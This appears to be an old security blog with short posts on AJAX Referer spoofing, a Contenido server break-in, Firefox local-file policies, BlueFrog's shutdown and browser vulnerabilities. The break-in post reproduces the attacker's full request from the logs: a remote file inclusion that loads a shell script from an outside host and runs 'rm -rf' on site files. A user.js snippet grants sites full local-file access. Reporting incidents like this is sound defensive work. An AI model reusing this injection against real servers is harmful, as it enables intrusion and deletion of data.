AJAX security
handgestrickt was curious about the question how secure AJAX is. so we wrote some scripts that tried to access data on foreign hosts and fake the referrer (the HTTP 1.1 RFC 2616 specification misspelled this word "Referer"). the result is great and makes us feel much better with AJAX. all the new browsers do not allow manipulating the "Referer" and do not allow accessing foreign hosts. we tested Firefox 2, Opera 9 and Internet Explorer 7 and used Prototype.js. additionally we checked whether Prototype.js denies setting the "Referer" and it definitely does not.
in the following code, we used some PHP-page that just outputs phpinfo(). we accessed this page with AJAX and a fake "Referer". try this at home if you like:
<html>
<head>
<title>refspoof-JS</title>
<script src="js/prototype.js" language="JavaScript" type="text/javascript"></script>
<script language="JavaScript">
var refspoof = {
test: function() {
new Ajax.Request('phpinfo.php', {
...
Contenido Code Injection
yesterday one of our customers servers was attacked. the whole Contenido and all other directories were deleted. after checking the Apache logs, it was obvious, what happened:
the IP address 201.19.76.194 started several attacks from 0.55 to 1.00 o'clock. the attacker used a TembeddedWB-based browser and tried to inject code into the Contenido class /contenido/classes/class.inuse.php. the code injected was http://www.tritonsdr2.by.ru/cmd.txt, which tells attackers versions, paths, and gives them a shell. at 0:56 o'clock the injection was successfull and the Apache gave a code 200 on the attack action. after this the website was completely gone. fortunately the database stayed untouched.
details, the full URL used was
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.tritonsdr2.by.ru/cmd.txt?&cmd=cd%20/data/export/http/WEB_DIR/http;rm%20-rf%20index.html;%20rm%20-rf%20index.*
this manipulated the Contenido-variable
$cfg[path][contenido]
in a way that class.inuse.php...
congratulations crackers child!
"Hacked By Crackers_Child
crackers_child@sibersavascilar.com
it is our game only for intelligent people
Stupids (Lamers) Cant Play Ýt , They Only Suppose you have good security ? :D
BiG and Dangerous Game
H-A-C-K
BlackHat"
this was the intelligent message they left on our website after hacking the complete server.
1. intelligent people speak english, not kindergarten-blabla
2. intelligent people use their skills for something useful, not compensate their complexes and ruined childhood by damaging other peoples properties
3. who are the stupid lamers?
4. go and learn some HTML. because the HTML we found was oldest HTML 3.2
feel free to use the above email-address to write them some emails and tell them how sorry we all are for them!
server-provider:
"the IP of the hacker could be followed to budapest, but it is nearly impossible to catch those people by law. [...] reading the logs to track the complete steps the hacker did, showed that data was overwritten, but not read. there is no...
Firefox blocks local links
recently a website handgestrickt uses frequently, blocked some contents. an analysis showed, that the website was referencing local content on the harddisc. the M$ Internet Exploiter, well known as the biggest security hole in the universe, allows these references, Firefox and Opera do not. another reason why we use Firefox here!
the risks are clear. some people could start programs on your computer, reference local content into a frame, then use JavaScript to read the content and send it over a webform. bad people have a lot of bad ideas how to exploit this.
the new releases of Firefox allow a per-website-policy to allow some websites access to your local files. all you have to do is add the following to your user.js in your profile folder:
user_pref("capability.policy.policynames", "localfilelinks");
user_pref("capability.policy.localfilelinks.sites",
"http://www.example.com");
user_pref("capability.policy.localfilelinks.checkloaduri.enabled",
"allAccess");
you can also add several websites...
BlueFrog is dead
recently handgestrickt netzwerk followed the fight "BlueFrog versus international spammers". there is a loser: BlueFrog. after ongoing serious DDoS-attacks BlueFrog gave up. the spammers used millions of trojan-horse-infected computers to attack the BlueFrog-server. if you have BlueFrog still installed, you can uninstall it. BlueFrog is dead! the only thing you can do is using the normal spam-filters and get rid of this crap like you always did!
if only one person of hundreds uses an offer in an e-mail-spam, becomes infected by a trojan-horse or is tricked by a phishing e-mail, the bad guys already succeeded. every day the bad guys find another person, that has no clues about e-mail-security. that's how they earn money!
some security-related companies around the world warn about internet-extortion. some bad guys threaten big internet services to attack their servers if they do not pay an amount of money. the bad guys do permanent DDoS-attacks to make the service unusable or hack some...
holes in MSIE and Firefox
in the recent days new critical security holes in both browsers, Microsoft Internet Explorer 6 and Firefox 1.5.0.2, were made public.
the company secunia found a new exploit for Microsoft Internet Explorer 6, based on an exploit by Michal Zalewski. nested OBJECT-elements prevent MSIE from dereferencing a NULL-pointer in mshtml.dll. this hole can be used to run malicious code on a users machine.
related:
http://secunia.com/advisories/19762/
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045422.html
the company securident released an exploit for Firefox 1.5.0.2. the function call iframe.contentWindow.focus() can crash the browser. a possible buffer-overflow could result in running malicious code on a users machine. the Firefox-developer Daniel Veditz already confirmed this exploit.
related:
http://www.securident.com/vuln/ff.txt
